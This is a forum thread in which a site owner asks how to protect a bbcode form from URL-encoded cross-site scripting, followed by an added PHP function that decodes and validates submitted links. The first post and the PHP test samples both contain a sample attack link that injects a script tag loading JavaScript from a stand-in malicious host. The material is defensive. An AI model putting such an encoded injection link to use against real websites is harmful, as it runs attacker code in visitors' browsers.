I have a form that allows bbcode to be used. 3 days ago I was reading up on security again and came upon this site [technicalinfo.net] which tells about URL Encoded Attacks. I decided to try testing my form to see if it was vulnerable to these attacks. As you can guess, it is.
If a person was to insert the following code into the form,
{url}http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2fwww.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e{/url}
NOTE: replaced [ with {
the code appears on the page as inserted with all the % signs etc. The problem is that a person could click on this link and thus run the malicious code.
I have tried several different methods to try to subvert this with no luck. What I am trying to do is run a looping function to urldecode the area between the URL tags until no % signs are found (in case of multiple encoding). Then remove any < > { } [ ] ¦. Thus destroying the malicious code.
Like I said, I have been working on this for 3 days to no avail. Any help pointing me in the right direction will be greatly appreciated.
Regards,
IamStang
Maybe I am worrying about this kind of thing more than I should. I just don't want visitors inadvertently clicking on a link like this and getting into a heap of trouble they didn't count on. Or even worse, the code in the link causing the database to be subverted.
Are my concerns warranted?
Regards,
IamStang
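The decode-until-stable check described in the first post, written in PHP as an added example that is not part of the original thread. The function names, the cap of 5 decode rounds, the http/https allowlist, and rejecting a link instead of stripping characters from it are assumptions of this example; the post's ¦ is treated as the pipe character.

```php
<?php
// Added example, not code from the thread. Function names are hypothetical.
const MAX_DECODE_ROUNDS = 5; // assumption: deeper nesting is treated as hostile

// Decode repeatedly until the string stops changing. Comparing with the
// previous round (instead of testing for '%') terminates on a literal
// percent sign such as "100%" that is not part of an escape.
function fully_decode(string $s): ?string
{
    for ($i = 0; $i < MAX_DECODE_ROUNDS; $i++) {
        $next = urldecode($s);
        if ($next === $s) {
            return $s;
        }
        $s = $next;
    }
    return null; // still changing after the cap: refuse
}

// Return an escaped <a> tag for the body of a [url] tag, or null to reject it.
function render_bbcode_url(string $raw): ?string
{
    $raw = trim($raw);
    $decoded = fully_decode($raw);
    if ($decoded === null) {
        return null;
    }
    // The characters the post proposes to remove, plus quotes and control
    // bytes. The link is rejected so a mangled URL is never stored.
    if (preg_match('/[<>{}\[\]|"\'\x00-\x1f]/', $decoded)) {
        return null;
    }
    $scheme = parse_url($decoded, PHP_URL_SCHEME);
    if (!is_string($scheme) || !in_array(strtolower($scheme), ['http', 'https'], true)) {
        return null;
    }
    // Emit the original string, HTML-escaped, so accepted URLs are not altered.
    $safe = htmlspecialchars($raw, ENT_QUOTES, 'UTF-8');
    return '<a href="' . $safe . '" rel="nofollow noopener">' . $safe . '</a>';
}

// Constructed inputs: the link from the post, a double-encoded variant, a plain link.
$samples = [
    'http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2fwww.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e',
    'http://target/getdata.php?data=%253cscript%253e',
    'http://example.com/page.php?id=5&sort=100%',
];
foreach ($samples as $s) {
    echo (render_bbcode_url($s) ?? 'REJECTED'), "\n";
}
```

The first two samples are rejected and the third is rendered with its `&` escaped as `&amp;`. This check only governs what the form will render as a link; whether the script runs when a link is followed depends on how the page at the other end handles its `data` parameter.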